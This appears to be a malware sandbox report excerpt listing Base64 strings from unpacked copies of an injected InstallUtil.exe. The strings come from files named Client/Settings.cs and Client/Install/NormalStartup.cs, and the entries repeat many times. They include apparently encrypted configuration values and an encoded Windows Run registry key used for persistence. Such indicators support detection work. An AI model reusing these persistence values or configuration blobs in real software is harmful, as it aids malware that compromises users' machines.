Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
